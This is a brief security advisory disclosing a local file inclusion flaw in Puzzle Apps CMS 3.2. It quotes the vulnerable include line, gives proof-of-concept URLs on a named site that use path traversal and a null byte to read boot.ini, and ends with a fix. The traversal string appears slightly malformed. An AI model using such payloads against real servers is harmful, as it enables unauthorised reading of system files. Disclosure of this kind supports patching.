#------------------------------------------------------------------------
# Software ...... Puzzle Apps CMS 3.2
# Vulnerability ...... Local File Inclusion (LFI)
# Site ...... http://www.puzzleapps.org/
# Download Link ...... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download
# Discovery Date...
# Tested On...
#------------------------------------------------------------------------
# Author...
# Site ...... http://www.treasuresec.com/
# Email ...... Treasure Priyamal <treasure@treasuresec.com>
#------------------------------------------------------------------------
#
#
# -- Description --
#
# In Puzzle Apps CMS there are a couple of places where LFI vulnerabilities
# can be found.
#
#
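# -- Vulnerable Source --
# include_once($COREROOT."config/loader.config.php");
#
# $COREROOT is prepended to the include path as-is. In the requests below it
# is supplied as a query-string parameter (presumably this relies on
# register_globals being enabled), so the caller controls which file is
# included.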
#
# -- Sample to LFI --
#
# http://www.bkjia.com/puzzle/core/config.loader.php?COREROOT=[LFI]
#
#
# -- PoC LFI --
#
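# http://www.bkjia.com/puzzle/core/config.loader.php?COREROOT=.../../boot.ini%00
#
# The trailing %00 is a null byte intended to cut off the appended
# "config/loader.config.php" suffix. PHP 5.3.4 and later reject null bytes in
# file paths, so that truncation only works on older PHP versions; the
# unvalidated include still needs to be fixed in the application.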
#
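Fix: filter the input. COREROOT should not be taken from the request; define it in server-side code, or validate it against a fixed list of allowed paths before the include.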